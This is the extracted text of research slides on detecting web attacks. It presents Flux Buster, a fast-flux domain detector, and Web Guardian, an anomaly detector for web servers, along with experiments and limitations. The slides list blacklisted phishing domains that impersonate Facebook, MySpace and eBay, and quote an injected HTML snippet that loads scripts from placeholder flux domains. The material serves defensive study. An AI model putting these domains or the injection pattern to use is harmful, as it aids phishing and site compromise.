0e3fe6f42143105b.squadsvariousembryos.com, 0f255699977f3a81.ghostsbarredrental.com,
0fde9565dad27a33.nugentcelticdonnell.com, 100d83dcb74219a6.fraserlibraryshabby.com,
14cc04d937dd090f.fraserlibraryshabby.com, 163f3db2671f9703.fraserlibraryshabby.com,
189dda5b6c51569e.squadsvariousembryos.com, 18ad145ae37d4318.ghostsbarredrental.com,
191ab3abf627f482.nugentcelticdonnell.com, 1a3a25badc9819c5.nugentcelticdonnell.com
[· · · many more]
35. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - domain name Blacklisting
facebook phishing
facebook.shared.accessservlet.personalid-fbhmod8j9.processlogon.344session.com,
facebook.shared.accessservlet.personalid-kd0vb3bjj.ceptservlet.8345server.com,
facebook.shared.accessservlet.personalid-mct6meeyi.alternative.8345server.com,
facebook.shared.accessservlet.personalid-xm4f9y8xa.emberuiweb.344session.com,
facebook.shared.accountholder.personalid-0ip00okut.mixed.5435core.com,
facebook.shared.accountholder.personalid-3vj54osat.accountholder.344session.com,
facebook.shared.accountverify.personalid-4z37tsrz9.usermanage.344session.com,
facebook.shared.accountverify.personalid-sa3vts29i.serveronline.8345server.com [· · ·
many more]
36. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - domain name Blacklisting
myspace phishing
accounts.myspace.com.tteszk.org.uk, accounts.myspace.com.tteszk.me.uk,
accounts.myspace.com.tteszk.co.uk, accounts.myspace.com.tteszg.org.uk,
accounts.myspace.com.tteszg.me.uk, accounts.myspace.com.tteszg.co.uk,
accounts.myspace.com.tteszf.co.uk, accounts.myspace.com.ttesza.org.uk,
accounts.myspace.com.ttesza.me.uk, accounts.myspace.com.ttesza.co.uk,
accounts.myspace.com.terhhoq.org.uk, accounts.myspace.com.terhhoq.me.uk,
accounts.myspace.com.terhhoq.co.uk, accounts.myspace.com.terhhol.org.uk,
accounts.myspace.com.terhhol.me.uk, accounts.myspace.com.terhhol.eu,
accounts.myspace.com.terhhol.co.uk, accounts.myspace.com.terhhok.org.uk,
accounts.myspace.com.terhhok.me.uk, accounts.myspace.com.terhhok.eu,
accounts.myspace.com.iuuuujer.me.uk, accounts.myspace.com.iuuuujer.eu,
accounts.myspace.com.iuuuujer.co.uk, accounts.myspace.com.iuuuujek.org.uk,
accounts.myspace.com.iuuuujek.me.uk [· · · many more]
37. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - domain name Blacklisting
ebay phishing
cgi.ebay.com.fvdssrt.com, cgi.ebay.com.idservertff.net, cgi.ebay.com.idsrvtttr.com,
cgi.ebay.com.modefst10.mobi, cgi.ebay.com.msdrvffg.net, cgi.ebay.com.msdrvt1.bz,
cgi.ebay.com.msfddre.com, cgi.ebay.com.mtdfggs.com, cgi.ebay.com.sdlserverts.com,
cgi.ebay.com.trffdsl.com, cgi.ebay.com.vfrres.com, cgi.ebay.com.vsdfggg.net,
cgi.ebay.com.vvssldr.com, cgi.ebay.com.vvssldr.net, cgi.ebay.com.vzdfff1.com,
cgi.ebay.com.dllmsdrv.net
40. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - domain name Blacklisting
Time interval: November, 3, 2009 - February, 2, 2010. Flux
agents: 21,108 IP addresses. Fast flux domain names: 16,375.
Analysis of flux domain names through Google safebrowsing
18000
16000
Number of unique fast flux domain names
14000
12000
10000
8000
6000
4000
2000
0 Total Visited Malicious
41. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - domain name Blacklisting
Interpretation
We speculate that most of flux domain names are advertized by
webpages not indexed by Google, or by means of
non-web-based forms of advertisement. In fact, during our
experiments we came accross several compromised websites
whose injected HTML code was in the form:
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script src=http://fast-flux-domain-name1/script.js>
<script src=http://fast-flux-domain-name2/script.js>
...
<script src=http://fast-flux-domain-nameN/script.js> </META>
42. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - real time detection and spam filtering
Real time detection of suspicious websites
We may detect in real time suspicious domain names, i.e.
domain names whose resolved IPs are among the pool of
known flux agents (detected through our system).
43. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - real time detection and spam filtering
100
95
90
85
80
75
70
Detection Rate %
65
60
55
50
45
40
35
30
25
20 Day 2009-03-04, 33697 spam domains
15 Day 2009-03-06, 105608 spam domains
10 Day 2009-03-10, 103554 spam domains
5 Day 2009-03-15, 168298 spam domains
0
0.0 0.0002 0.0004 0.0006 0.0008 0.001 0.0012 0.0014 0.0016 0.0018
False Positive Rate % (Alexa TOP domains)
Interpretation
We spot almost all domain names inside spam emails. It is
worth noting that some of them do not have a “fluxy” behavior,
but resolve to flux agents characterized by high uptime.
44. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Our Contribution to Server-side Web Security
Web Guardian
45. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Anomaly-based approach
Problem
We would like to detect either known or unknown attacks
against web services. Also, we’d like to provide for automatic
counteractions against such attacks, to protect web services in
real time.
Our Approach
Given a sample of requests on the web server, we model
the normal (legitimate) web traffic profile
We detect web traffic that does not reflect the legitimate
profile (i.e. web attacks)
We may provide for well-suited real-time counteractions,
depending on the detected anomalies
46. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Architecture
47. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Learning framework
Problem
We cannot assume an
attack-free training set! Known
outlier detection techniques may
be not suitable for our task.
Automatic noise filtering
Each model is (re)trained
excluding some samples from
the training set.
48. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
General models
General-purpose models
Feature Model
Sequence of symbols Hidden Markov Model (model-a) -
Baum Welch Algorithm, states=avg
n. of distinct symbols in a se-
quence, random init state transition
and symbol emission matrix
σ2
Numeric Value p[x|model-b] = (x−µ)2 if x > µ + σ
count(x)
Discrete Value p[x|model-c] =
total n. samples
49. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Modeled features
model-a sequence of: headers; web app. attributes;
attribute inputs (generalization of numbers and
letters);
model-b ratio between rejected and successful requests,
and frequency of requests on each web
application, per source IP address; for each
header, its input lenght;
model-c method; http version; for each header, the
following flags: has-alphabetic-input,
has-digit-input; for each header: list of
non-alphanumeric input characters.
50. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Experiments
Dataset Λ = Σ ∪ T
time interval 27 November - 3
December, 2009
number of web requests 447,178
distinct IP addresses 1,703
bad requests 5,507
web application queries 98,900
number of web applications 217
Dataset Σ and T
Σ contains the first 200,000 requests in Λ, and it is employed
for training the system. T contains the remaining 247,178
requests, and it is used for performance evaluation.
51. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Experiments
Training phase
CPU Intel CoreDuo2 T8100 2.1Ghz, 2GBytes of RAM, and
Linux (Ubuntu 8.04) Operating System. Training time: 2 hours
and 53 minutes RAM max 1.6GBytes.
OK, but what about attacks inside dataset Λ?
We identify attacks inside Λ with the help of Web Guardian. For each model, we
manually inspect the training samples receiving lower probability. This is justified since:
(a) we may assume that attack samples are in lower number w.r.t. legitimate samples,
(b) attacks are characterized by patterns significantly different from legitimate patterns.
Furthermore, this process is not expensive, because we need to inspect only a small
protion of training samples for each model.
52. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Experiments
Attack dataset Φ
Target Details Attack Type References Attacks
web applica- 90 distinct web applications cross-site scripting, [Spett (2002)] 412
tion queries and 372 attributes sql injection, remote [Admin (2002)]
code execution, re- [Mac Vittie (2007)]
mote file inclusion, [Hansen (2009)]
information gathering [Pastor (2009)]
[Auger (2010)]
[L0t3k]
headers Accept, generic buffer over- [Bellamy (2002)] 78
Accept-Language, flow, cross-site [PSS (2002)]
Referer, Content-Type, scripting, sql injec- [Linhart et al. (2005)]
Accept-Encoding, tion, http request [Symantec (2006)]
User-Agent, Host, smuggling, CRLF [CAPEC (2007)]
Content-Length, injection [Bajpai (2009)]
Connection, [Mac Vittie (2010)]
Cache-Control, Cookie,
Via, X-Forwarded-For,
If-Modified-Since
method PROPFIND, OPTIONS, buffer overflow, [Donaldson (2002)] 12
TRACE and bad strings cross-site scripting, [Juniper (2002)]
information gathering [Manion (2003)]
[Shah (2004)]
http version bad format string buffer overflow, infor- [Donaldson (2002)] 5
mation gathering [Shah (2004)]
53. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Experiments
Results
Parameter Dataset Value
Λ = Σ∪T 232/232 100% ∼39alerts/day
detection rate
Φ 505/507 99.6%
Λ 1,252/447,178 0.28% ∼209alerts/day
false alarm rate Σ 450/200,000 0.22% ∼150alerts/day
T 802/247,178 0.32% ∼267alerts/day
response time Λ 1.2 milliseconds
54. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Experiments
Observation
It is worth to note that a significantly lower false positive rate may be attained by
manually verifying false alarms on our web interface. Using such a interface we may:
group anomalies depending on their type: i.e. what is the model which raised the
anomaly, common traits of the anomaly (e.g. a suspect non-alphanumeric
character), source IP address, targeted web application/header
adjust model thresholds, so that attacks may be still reliably evidenced and false
alarms are reduced
(re)train models using some samples which have been erroneously discarded by
the learning framework (e.g. because there were no attacks in the set of training
samples)
55. Detection of Web-based attacks
Our Contribution to Server-side Web Security
Web Guardian
Implementation
56. Detection of Web-based attacks
Research Contributions - summary
Flux Buster
novel, passive approach for detecting and tracking malicious flux service
networks.
we detect fast flux domain names, regardless the way they are advertised
active probing proposed so far is expensive, requires a distributed architecture,
and may be detected and blocked/influenced by miscreants. Contrary, we do not
interact ourselves with the flux network and our approach is stealthy.
we accurately characterize and detect flux networks. By means of Flux Buster
we may substantially enhance the state-of-the-art protection of web users and
spam filtering applications.
57. Detection of Web-based attacks
Research Contributions - summary
Web Guardian
unsupervised training which effectively handles the presence of attacks in the
training set
accurate detection both known and unknown attacks against web services. This
complements the rule-based approach of modsecurity.
low false positive rate
ability to counteract in real time, and thus protect web services
multiple, specific anomaly detectors allow to (a) infer the typology of an attack,
(b) further reduce false positives by grouping similar anomalies, (c) provide for
well-suited counteractions
easy to extend with new models/features
the host-based approach allows us to limit evasive attacks (e.g.
desynchronization) and monitor both HTTP and HTTPS traffic
58. Detection of Web-based attacks
Limitations - summary
Flux Buster
the approach is effective only if applied in large computer networks
some flux domain names may be erroneously prefiltered. To this end, a detailed
evaluation is required. For example, we could select filtered domain names
whose patterns are placed near the decision surface of our prefiltering stage.
Then, we may analyze them using other fast flux detection tools (e.g.
abuse.ch).
due to the massive amount of data Flux Buster has to process, the
responsiveness of Flux Buster is slow. However, this limitation may be reduced
by employing the detection approach proposed for spam filtering.
in principle, fast flux operators may deliberately inject some legitimate IP address
in the pool of flux agents. However, they have to pay a reduced effectiveness of
flux domain names. In order to cope with this issue, we may filter
known-as-legitimate IP addresses from the pool of flux agents, e.g. by extracting
all IP addresses used by most popular websites according to legitimate
organizations such as Alexa.
59. Detection of Web-based attacks
Limitations - summary
Web Guardian
it is fundamentally limited to the detection of input validation attacks. In order to
detect web attacks exploiting logical vulnerabilities, we must add new features
and models.
actually we do not have a description of attacks. We are working on the
automatic inference of the attack class, given an anomaly.
false alarm injection: automatic counteractions may still prevent successful
attacks. However, as matter of fact, the false alarm injection attacks are not
currently addressed by Web Guardian. As future work we intend to research
solutions to this issue.
61. Detection of Web-based attacks
Thank you!
SANS Institute (2009). The Top Cyber Security Risks -
september 2009. ⇒ web link (accessed January 2010)
Cenzic, Inc. (2009). Web Application Security Trends
Report ⇒ web link (accessed January 2010)
Spett, K. (2002). SQL Injection: Are Your Web Applications
Vulnerable?, A White Paper from SPI Dynamics ⇒ web link
(accessed January 2010)
admin@cgisecurity.com (2002). The Cross Site Scripting
FAQ, Packet storm security ⇒ web link (accessed February
2010)
Mac Vittie, L. (2007). SQL Injection Evasion Detection, F5
Whitepaper ⇒ web link (accessed January 2010)
Hansen, R. (2009). XSS (Cross Site Scripting) Cheat Sheet
for filter evasion, ha.ckers.org ⇒ web link (accessed
January 2010)
62. Detection of Web-based attacks
Thank you!
Pastor, A. (2009). CVE-2009-1151: phpMyAdmin Remote
Code Execution Proof of Concept, GNUCitizen ⇒ web link
(accessed February 2010)
Auger, R. (2010). Remote File Inclusion, The Web
Application Security Consortium ⇒ web link (accessed
February 2010)
L0t3k, SQL Injection: The Complete Documentation ⇒
web link (accessed January 2010)
Bellamy, W. (2002). HyperText Transfer Protocol (HTTP)
Header Exploitation, Advanced Incident Handling and
Hacker Exploits, SANS GIAC GCIH Practical Assignment
v2.1 ⇒ web link (accessed January 2010)
Packet Storm Security (2002). Apache 2.0 Cross-Site
Scripting Vulnerability, ⇒ web link (accessed February
2010)
63. Detection of Web-based attacks
Thank you!
Linhart, C., Klein, A., Heled, R., Orrin, S. (2005). HTTP
Request Smuggling, Watchfire ⇒ web link (accessed
January 2010).
Symantec (2006). HTTP Smuggle Get Content Length,
attack signature ⇒ web link (accessed January 2010)
Common Attack Pattern Enumeration and Classification
(CAPEC)-86: Embedding Script (XSS) in HTTP Headers,
MITRE Corporation, ⇒ web link (accessed February 2010)
Bajpai, G. (2009). HP OpenView NNM HTTP
Accept-Language header Buffer Overflow Vulnerability,
iPolicy Networks Security Advisory ⇒ web link (accessed
February 2010)
Mac Vittie, L. (2007). I am in your HTTP headers, attacking
your application, F5 Whitepaper ⇒ web link (accessed
January 2010)
64. Detection of Web-based attacks
Thank you!
Donaldson, M.E. (2002). Inside the Buffer Overflow Attack:
Mechanism, Method, & Prevention, SANS Institute
InfoSec Reading Room, SANS Whitepaper ⇒ web link
(accessed January 2010)
Juniper Networks (2002). HTTP: Apache WebDav
PROPFIND Directory Disclosure ⇒ web link (accessed
January 2010)
Manion, A. (2003). Web servers enable HTTP TRACE
method by default, Vulnerability Note VU#867593,
US-CERT ⇒ web link (accessed January 2010)
Shah, S. (2004). An Introduction to HTTP fingerprinting,
Net square ⇒ web link (accessed January 2010)